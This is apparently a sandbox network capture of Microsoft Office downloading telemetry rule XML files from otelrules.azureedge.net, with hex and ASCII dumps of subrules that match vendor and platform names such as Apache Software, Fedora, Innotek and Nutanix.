2024-11-07 06:33:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:06 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063306Z-16547b76f7fr4g8xhC1DFW9cqc00000006xg00000000bekb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:06 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:06 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:06 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 26055832-201e-0096-545c-2eace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063306Z-15869dbbcc6xpvqthC1DFWq7d8000000017g0000000071n8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:06 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:06 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:06 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063306Z-16547b76f7fm7xw6hC1DFW5px400000007qg000000006evp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:06 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:06 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:06 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063306Z-16547b76f7fcjqqhhC1DFWrrrc00000007t0000000005kq1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:06 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:07 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:07 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: f5f9e784-f01e-0071-765c-2e431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063307Z-15869dbbcc6tjwwhhC1DFWn228000000011000000000ap72 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:07 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:07 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:07 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 1a545004-b01e-0084-4b01-2fd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063307Z-17df447cdb5jg4kthC1DFWux4n000000042000000000319h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:07 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:07 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:07 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:07 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063307Z-16547b76f7f9bs6dhC1DFWt3rg00000007q000000000cskf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:07 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:07 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:07 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:07 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: e93469fd-701e-005c-665f-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063307Z-17df447cdb528ltlhC1DFWnt1c00000003r000000000mxfg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:07 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:08 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: c005f6c1-a01e-003d-4d3f-2e98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063308Z-15869dbbcc6rmhmhhC1DFWd7b8000000089000000000b3f2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:08 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:09 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063308Z-16547b76f7fcrtpchC1DFW52e800000007sg00000000c3h9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:09 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:08 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063308Z-16547b76f7f4k79zhC1DFWu9y000000007pg00000000p30u x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:09 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:08 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:08 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063308Z-16547b76f7f8dwtrhC1DFWd1zn00000007tg00000000g1w0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:09 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
